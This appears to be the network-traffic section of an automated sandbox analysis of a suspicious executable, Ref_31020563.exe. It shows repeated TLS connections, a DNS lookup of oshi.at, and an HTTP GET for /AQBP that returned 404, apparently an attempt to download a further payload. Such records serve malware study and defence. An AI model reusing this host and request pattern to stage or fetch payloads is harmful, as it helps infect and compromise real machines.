                                          Dec 10, 2024 16:29:26.397723913 CET44349757194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:26.440128088 CET49757443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:26.449462891 CET49757443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:26.449480057 CET44349757194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:27.272959948 CET44349757194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:27.272983074 CET44349757194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:27.273045063 CET44349757194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:27.273078918 CET49757443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:27.273116112 CET49757443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:27.273657084 CET49757443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:27.274254084 CET49758443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:27.274327040 CET44349758194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:27.274508953 CET49758443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:27.274782896 CET49758443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:27.274796009 CET44349758194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:29.327477932 CET44349758194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:29.348433971 CET49758443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:29.348458052 CET44349758194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:30.163526058 CET44349758194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:30.163553953 CET44349758194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:30.163631916 CET44349758194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:30.163697958 CET49758443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:30.163738966 CET49758443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:30.164321899 CET49758443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:30.164954901 CET49759443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:30.165010929 CET44349759194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:30.165100098 CET49759443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:30.165335894 CET49759443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:30.165347099 CET44349759194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:32.286006927 CET44349759194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:32.312170982 CET49759443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:32.312220097 CET44349759194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:33.137398005 CET44349759194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:33.137423038 CET44349759194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:33.137466908 CET49759443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:33.137487888 CET44349759194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:33.137522936 CET49759443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:33.138001919 CET49759443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:33.138509035 CET49760443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:33.138554096 CET44349760194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:33.138612032 CET49760443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:33.138853073 CET49760443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:33.138864040 CET44349760194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:35.237034082 CET44349760194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:35.238656998 CET49760443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:35.238684893 CET44349760194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:36.051156044 CET44349760194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:36.051178932 CET44349760194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:36.051255941 CET44349760194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:36.051280975 CET49760443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:36.051306009 CET49760443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:36.051717043 CET49760443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:36.052258015 CET49761443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:36.052309990 CET44349761194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:36.052392960 CET49761443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:36.052592993 CET49761443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:36.052608013 CET44349761194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:38.069113970 CET44349761194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:38.078464985 CET49761443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:38.078495026 CET44349761194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:38.891912937 CET44349761194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:38.891940117 CET44349761194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:38.891999960 CET44349761194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:38.892069101 CET49761443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:38.892095089 CET49761443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:38.892653942 CET49761443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:38.893311977 CET49762443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:38.893367052 CET44349762194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:38.893429041 CET49762443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:38.893693924 CET49762443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:38.893718004 CET44349762194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:40.990353107 CET44349762194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:40.992064953 CET49762443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:40.992094994 CET44349762194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:41.778199911 CET44349762194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:41.778227091 CET44349762194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:41.778286934 CET44349762194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:41.778398037 CET49762443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:41.778513908 CET49762443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:41.778945923 CET49762443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:41.779555082 CET49763443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:41.779587030 CET44349763194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:41.779694080 CET49763443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:41.779912949 CET49763443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:41.779923916 CET44349763194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:43.854223013 CET44349763194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:43.855777025 CET49763443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:43.855802059 CET44349763194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:44.670023918 CET44349763194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:44.670051098 CET44349763194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:44.670114040 CET44349763194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:44.670178890 CET49763443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:44.670205116 CET49763443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:44.670725107 CET49763443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:44.671303034 CET49764443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:44.671406031 CET44349764194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:44.671525955 CET49764443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:44.671727896 CET49764443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:44.671766043 CET44349764194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:46.755108118 CET44349764194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:46.756611109 CET49764443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:46.756640911 CET44349764194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:47.540333986 CET44349764194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:47.540369034 CET44349764194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:47.540443897 CET44349764194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:47.540451050 CET49764443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:47.540488958 CET49764443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:47.544234991 CET49764443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:47.544771910 CET49765443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:47.544816971 CET44349765194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:47.544898987 CET49765443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:47.545152903 CET49765443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:47.545170069 CET44349765194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:49.628102064 CET44349765194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:49.629800081 CET49765443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:49.629810095 CET44349765194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:50.435972929 CET44349765194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:50.436005116 CET44349765194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:50.436079979 CET44349765194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:50.436235905 CET49765443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:50.436235905 CET49765443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:50.436661005 CET49765443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:50.437266111 CET49766443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:50.437313080 CET44349766194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:50.437398911 CET49766443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:50.437619925 CET49766443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:50.437645912 CET44349766194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:52.516496897 CET44349766194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:52.520545959 CET49766443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:52.520560980 CET44349766194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:53.312196970 CET44349766194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:53.312227011 CET44349766194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:53.312306881 CET44349766194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:53.312482119 CET49766443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:53.312974930 CET49766443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:53.313514948 CET49767443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:53.313575029 CET44349767194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:53.313659906 CET49767443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:53.313880920 CET49767443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:53.313895941 CET44349767194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:55.397782087 CET44349767194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:55.399604082 CET49767443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:55.399646997 CET44349767194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:56.201476097 CET44349767194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:56.201492071 CET44349767194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:56.201539040 CET49767443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:56.201572895 CET44349767194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:56.201587915 CET44349767194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:56.201627970 CET49767443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:56.202589989 CET49767443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:56.203403950 CET49768443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:56.203443050 CET44349768194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:56.203510046 CET49768443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:56.203994989 CET49768443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:56.204009056 CET44349768194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:58.293308020 CET44349768194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:58.295341015 CET49768443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:58.295356989 CET44349768194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:59.185849905 CET44349768194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:59.185879946 CET44349768194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:59.185952902 CET44349768194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:59.185990095 CET49768443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:59.186029911 CET49768443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:59.186686039 CET49768443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:59.187097073 CET49769443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:59.187125921 CET44349769194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:29:59.187200069 CET49769443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:59.187414885 CET49769443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:29:59.187422991 CET44349769194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:01.287694931 CET44349769194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:01.289478064 CET49769443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:01.289503098 CET44349769194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:02.079487085 CET44349769194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:02.079515934 CET44349769194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:02.079585075 CET44349769194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:02.079608917 CET49769443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:02.079652071 CET49769443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:02.080138922 CET49769443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:02.080657959 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:02.080709934 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:02.080801964 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:02.081020117 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:02.081031084 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.145190954 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.147108078 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.147123098 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.971393108 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.971415043 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.971482038 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.971560955 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.971592903 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.972356081 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.972929001 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.972963095 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.974771976 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.974971056 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.974987030 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:07.043699026 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:07.045408010 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:07.045423985 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.144686937 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.144711018 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.144793034 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.144840956 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.144879103 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.145569086 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.146150112 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.146207094 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.146295071 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.146562099 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.146586895 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.229820013 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.231950045 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.231971025 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.962615013 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.962637901 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.962701082 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.962743998 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.962796926 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.966707945 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.967327118 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.967390060 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.967448950 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.967674017 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.967689991 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.038268089 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.046117067 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.046159029 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.861282110 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.861299992 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.861370087 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.861375093 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.861424923 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.862008095 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.862699032 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.862737894 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.862806082 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.863037109 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.863049030 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:15.943689108 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:15.945337057 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:15.945350885 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.740180969 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.740209103 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.740268946 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.740273952 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.740313053 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.740753889 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.741317034 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.741359949 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.741435051 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.741632938 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.741646051 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:18.850009918 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:18.851578951 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:18.851623058 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.661657095 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.661688089 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.661767006 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.661799908 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.661837101 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.662323952 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.662815094 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.662863016 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.662929058 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.663153887 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.663168907 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:21.750158072 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:21.751805067 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:21.751821041 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.805948973 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.805967093 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.806008101 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.806022882 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.806046963 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.806082964 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.806524992 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.807068110 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.807120085 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.807184935 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.807394981 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.807405949 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:24.887818098 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:24.889529943 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:24.889561892 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.705406904 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.705430031 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.705504894 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.705538034 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.705590963 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.706258059 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.706851006 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.706897020 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.710937977 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.711253881 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.711266041 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:27.796731949 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:27.798222065 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:27.798238039 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.588843107 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.588865995 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.588938951 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.589138031 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.589690924 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.590296030 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.590344906 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.590651989 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.590651989 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.590682030 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:30.706397057 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:30.710566044 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:30.710596085 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:31.493407965 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:31.493427038 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:31.493496895 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:31.493541002 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:31.493594885 CET49779443192.168.2.8194.15.112.248
                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 10, 2024 16:27:23.357001066 CET5699753192.168.2.81.1.1.1
                                          Dec 10, 2024 16:27:23.496228933 CET53569971.1.1.1192.168.2.8
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 10, 2024 16:27:23.357001066 CET192.168.2.81.1.1.10x8369Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 10, 2024 16:27:23.496228933 CET1.1.1.1192.168.2.80x8369No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                          Dec 10, 2024 16:27:23.496228933 CET1.1.1.1192.168.2.80x8369No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                          • oshi.at
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.849713194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:25 UTC61OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          Connection: Keep-Alive
                                          2024-12-10 15:27:26 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:26 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:26 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
